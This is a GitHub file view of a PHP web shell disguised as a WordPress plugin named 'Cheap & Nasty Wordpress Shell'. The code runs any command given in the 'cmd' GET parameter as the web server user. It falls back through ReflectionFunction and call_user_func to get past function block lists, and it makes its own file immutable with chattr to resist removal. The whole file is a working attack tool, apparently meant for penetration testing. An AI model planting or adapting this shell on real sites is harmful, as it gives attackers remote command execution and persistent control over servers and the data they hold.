forked from leonjza/wordpress-shell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
shell.php
43 lines (32 loc) · 1.53 KB
/
shell.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
/*
Plugin Name: Cheap & Nasty Wordpress Shell
Plugin URI: https://github.com/leonjza/wordpress-shell
Description: Execute Commands as the webserver you are serving wordpress with! Shell will probably live at /wp-content/plugins/shell/shell.php. Commands can be given using the 'cmd' GET parameter. Eg: "http://192.168.0.1/wp-content/plugins/shell/shell.php?cmd=id", should provide you with output such as <code>uid=33(www-data) gid=verd33(www-data) groups=33(www-data)</code>
Author: Leon Jacobs
Version: 0.2
Author URI: https://leonjza.github.io
*/
# attempt to protect myself from deletion
$this_file = __FILE__;
@system("chmod ugo-w $this_file");
@system("chattr +i $this_file");
# grab the command we want to run from the 'cmd' GET parameter
$command = $_GET["cmd"];
# Try to find a way to run our command using various PHP internals
if (class_exists('ReflectionFunction')) {
# http://php.net/manual/en/class.reflectionfunction.php
$function = new ReflectionFunction('system');
$function->invoke($command);
} elseif (function_exists('call_user_func_array')) {
# http://php.net/manual/en/function.call-user-func-array.php
call_user_func_array('system', array($command));
} elseif (function_exists('call_user_func')) {
# http://php.net/manual/en/function.call-user-func.php
call_user_func('system', $command);
} else {
# this is the last resort. chances are PHP Suhosin
# has system() on a blacklist anyways :>
# http://php.net/manual/en/function.system.php
system($command);
}